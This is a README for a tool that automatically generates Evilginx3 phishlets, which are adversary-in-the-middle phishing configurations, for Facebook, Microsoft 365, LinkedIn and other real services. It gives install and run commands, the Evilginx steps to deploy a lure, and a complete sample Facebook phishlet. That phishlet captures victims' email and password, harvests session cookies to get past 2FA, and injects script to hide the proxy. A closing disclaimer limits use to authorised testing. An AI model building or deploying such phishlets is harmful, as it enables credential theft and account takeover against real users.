βββββββββββββββββββββββ βββββββ βββββββ βββββββ βββββββ βββββββββββ βββ
βββββββββββββββββββββββββββββββββ βββββββββββββββββββββββββββββββββββββββββ
βββββ ββββββ βββββββββββ βββ βββ βββ ββββββ βββββββββ ββββββ
βββββ ββββββ βββββββββββ βββ βββ βββ ββββββ βββββββββ ββββββ
βββββββββββββββββββ ββββββββββββ βββββββββββββββββββββββββββββββββββββ βββ
βββββββββββββββββββ βββ βββββββ βββββββ βββββββ βββββββ βββββββββββ βββ
Automated Evilginx3 phishlet builder powered by real browser automation
Developer: Momen Abu Assi Β |Β Project: ZeroCodeX
Zero Codex Phishlet Generator automates the creation of .yaml phishlet files for Evilginx3.
Instead of manually reverse-engineering a website's login flow, this tool:
- Launches a real Chromium browser and navigates to the target site
- Logs in with your test credentials to capture live network traffic
- Automatically detects POST fields, session cookies, and auth tokens
- Handles CAPTCHA and 2FA by pausing for manual resolution
- Outputs a production-ready
.yamlphishlet file
Supported targets include Facebook, LinkedIn, X/Twitter, Microsoft 365, Instagram, Spotify, OnlyFans, GitHub, Reddit, and any custom site.
| Feature | Description |
|---|---|
| π€ Smart Field Classification | Automatically separates credentials, dynamic tokens, and static force values |
| πͺ Cookie Harvesting | Collects and stabilises session cookies after login |
| π CAPTCHA / 2FA Support | Pauses indefinitely for manual challenge solving |
| π Multi-step Login | Handles email β next β password flows (Twitter, Microsoft) |
| π‘οΈ Anti-Detection | Injects js_inject scripts to hide proxy indicators |
| π§Ή Smart Filtering | Removes noise domains, ad trackers, and irrelevant cookies |
| β‘ Auto domain mapping | Detects required CDN and API subdomains automatically |
| π YAML Serializer | Generates clean, valid Evilginx3-compatible YAML |
| Component | Version |
|---|---|
| Python | 3.7 or higher |
| pip | Latest |
| Playwright + Chromium | Via pip |
| Evilginx3 | 3.0.0 or higher |
git clone https://github.com/MomenAbuAssi/Phishlets-Build.git
cd Phishlets-Buildpip install -r requirements.txtrequirements.txt
colorama
playwright
urllib3
playwright install chromiumplaywright install-deps chromiumpython phishlet_generator.pyThe tool guides you through interactive prompts:
[?] Target URL: https://www.facebook.com/
Enter the real website you want to generate a phishlet for.
[?] Fake domain (e.g. evil.com): your-domain.com
Your phishing domain β must be under your control and pointed to your Evilginx3 server.
[?] Phishlet name [facebook]:
Press Enter to use the auto-detected name, or type a custom one.
[?] Headless? (y/N):
N(recommended) β visible browser window, allows manual CAPTCHA/2FA solvingyβ background mode for servers (CAPTCHA cannot be solved manually)
[?] Login page:
1. Auto-detect (click login button)
2. Provide direct login URL
Option 2 is recommended for most sites to skip the landing page.
[?] Have account? (y/N): y
[?] Email/username: test@example.com
[?] Password:
Using a real account captures live POST traffic and session cookies, producing a complete phishlet.
Phase 1: Navigation β Opens the login page
Phase 2: Login Flow β Fills credentials, submits, waits for result
Phase 3: Form Extract β Scans DOM for form fields and hidden tokens
Phase 4: Cookie Collect β Harvests session cookies from all subdomains
Phase 5: Stabilisation β Waits for cookie jar to stabilise (up to 60s)
Build: YAML Output β Generates the phishlet file
If a challenge appears, the script pauses automatically:
[!] CAPTCHA β solve it manually in the browser window.
[i] Script is waiting indefinitely...
[β] CAPTCHA solved β continuing...
Solve the challenge in the open browser window β the script resumes on its own.
[β] Done (β
Real login).
[+] Building YAML...
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β PHISHLET SAVED: phishlets/facebook.yaml
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Mode : β
Real login
Proxy hosts : 6
Auth tokens : 9
Force POST : 2 entries
Auth URLs : 2
Credentials : user=email pass=pass
Login : www.facebook.com/login/
The phishlet is saved in the phishlets/ folder (created automatically).
After generating the phishlet:
phishlets load facebook
phishlets hostname facebook your-domain.com
phishlets enable facebook
lures create facebookname: 'facebook'
min_ver: '3.0.0'
proxy_hosts:
- {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com',
session: true, is_landing: true, auto_filter: true}
sub_filters:
- {triggers_on: 'www.facebook.com', search: 'https://www.facebook.com',
replace: 'https://{hostname}', mimes: ['text/html', ...]}
auth_tokens:
- domain: '.facebook.com'
keys: ["c_user", "xs", "fr", "datr", ".*,regexp"]
credentials:
username: {key: 'email', search: '(.*)', type: 'post'}
password: {key: 'pass', search: '(.*)', type: 'post'}
auth_urls:
- '/'
- '/home.php'
login:
domain: 'www.facebook.com'
path: '/login/'
force_post:
- path: '/api/graphql/'
search:
- {key: '__user', search: '(.*)'}
force:
- {key: '__ccg', value: 'GOOD'}
type: 'post'
js_inject:
- trigger_domains: ['www.facebook.com']
trigger_paths: ['/login/', '/']
script: |
(function() {
Object.defineProperty(document, 'domain', {
get: function() { return 'facebook.com'; }
});
})();| Problem | Solution |
|---|---|
playwright not recognised |
Run pip install playwright then playwright install chromium |
| Script freezes on CAPTCHA | Solve it manually in the browser β script resumes automatically |
| Login fails immediately | Check credentials; script cannot bypass wrong passwords |
| No cookies collected | Ensure Have account? y and login was fully successful |
| Page loads without styling | CDN subdomains not proxied β run again with a stable connection |
force_post: missing force field |
Evilginx version issue β add force: [] manually or upgrade Evilginx |
Wrong login.path generated |
Use option 2 and provide the direct login URL manually |
Every POST field captured during login is automatically classified:
Email / Password β search (captured from victim)
Dynamic tokens (lsd, __s...) β search (captured per-session)
remember_me, LoginOptions β force (injected as fixed value)
debug, trace, request_id β ignored (noise)
Values longer than 20 chars β ignored (dynamic tokens/hashes)
Only 9 whitelisted keys can appear in force:
remember_me, rememberme, keep_me_signed_in, stay_signed_in,
persistent, loginoptions, remembermfa, __ccg, login
zero-codex-phishlet-generator/
βββ phishlet_generator.py # Main script
βββ requirements.txt # Python dependencies
βββ README.md # This file
βββ .gitignore # Ignore phishlets output
βββ phishlets/ # Generated YAML files (auto-created)
βββ facebook.yaml
βββ linkedin.yaml
βββ ...
This tool is provided strictly for educational purposes and authorised penetration testing only.
- You must have explicit written permission from the target organisation
- Unauthorised use against real users or systems is illegal in most jurisdictions
- The author assumes no liability for any misuse or damage caused
Use responsibly. Stay ethical.
Zero Codex Engine β Phishlet Generator
Developer: Momen Abu Assi
For authorised security research and penetration testing only.
Zero Codex Engine β Built for security researchers
If this tool helped your research, consider giving it a β